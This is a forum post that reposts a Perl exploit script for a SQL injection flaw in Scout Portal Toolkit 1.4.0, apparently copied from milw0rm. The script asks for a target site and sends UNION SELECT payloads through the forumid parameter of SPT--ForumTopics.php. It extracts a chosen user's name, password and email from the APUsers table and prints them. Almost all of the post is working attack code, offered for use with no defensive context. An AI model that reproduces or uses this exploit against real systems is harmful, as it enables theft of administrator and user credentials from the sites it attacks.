Jump to content
ghici

Scout Portal Toolkit 1.4.0 Remote SQL injection Exploit

Recommended Posts

Posted

#!/usr/bin/perl

#===============================================================

# Scout Portal Toolkit 1.4.0 Remote SQL injection Exploit

# Coded By Simo64

# Moroccan Security Research Team

# Specials thx to :Greetz :

# CiM-Team - CrAsH_oVeR_rIdE - dabdoub - damip - DarkbiteX - drackanz - Iss4m - megamati

# Mourad - Preddy -Rachid - RapYaS - r00tkita - S4mi - secteura - Silitix - tahati - And All Freinds !

#===============================================================

# Details :

# Scout Portal Toolkit 1.4.0 Remote SQL injection Vulnerability

# Website : http://scout.wisc.edu/Projects/SPT/

# Vulnerable File : SPT--ForumTopics.php

# PoC : ]http://host/path/SPT--ForumTopics.php?forumid=

# Exemple :

# This will display admin name and password

# Exploit : http://victime/path/SPT--ForumTopics.php?f...+WHERE+UserId=1

# The exploit will work regardless of magic_quotes_gpc is set or not

#==============================================================

use LWP::Simple;

print "n===============================================================";

print "n= Scout Portal Toolkit <= 1.4.0 Remote SQL injection Exploit =";

print "n= Discovred & Coded By Simo64 =";

print "n= Moroccan Security Research Team =";

print "n===============================================================nn";

my($targ,$path,$userid,$xpl,$xpl2,$data,$data2,$email);

print "Enter Traget Exemple: http://site.com/ nTraget : ";

chomp($targ = <STDIN>);

print "nnEnter Path TO Portal exemple: /SPT/ OR just / nPath : ";

chomp($path=<STDIN>);

print "nnEnter userid Exemple: 1nUserID : ";

chomp($userid=<STDIN>);

$xpl1="-9+UNION+SELECT+null,UserName,UserPassword,null,null,null+FROM+APUsers+WHERE+UserId=";

$xpl2="-9+UNION+SELECT+null,Email,null,null,null,null+FROM+APUsers+WHERE+UserId=";

print "n[+] Connecting to: $targn";

$data = get($targ.$path."SPT--ForumTopics.php?forumid=".$xpl1.$userid) || die "n[+]Connexion Failed!n";

$data2 = get($targ.$path."SPT--ForumTopics.php?forumid=".$xpl2.$userid) || die "n[+]Connexion Failed!n";

print "n[+] Connected !n";

print "[+] Sending Data to $targ ....nn";

$username=substr($data,index($data,"<h1>")+11,index($data,"</h1>")-12);

chomp $username;

$password=substr($data,index($data,"</h1>")+34,index($data,"</p>")-index($data,"</h1>")-34);

chomp $password;

$email=substr($data2,index($data,"<h1>")+11,index($data2,"</h1>")-12);

chomp $email;

if(length($password) <= 34){

print "[!]Exploit Succeded !n********************nn========= UserID = $userid Infos =======";

print "n= UserID : ".$userid;

print "n= Username : ".$username;

print "n= Password : ".$password;

print "n= Email : ".$email;

print "n===================================nnEnjoy !";

}

else {print "n[!] Exploit Failed !";}

# milw0rm.com [2006-06-27]

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...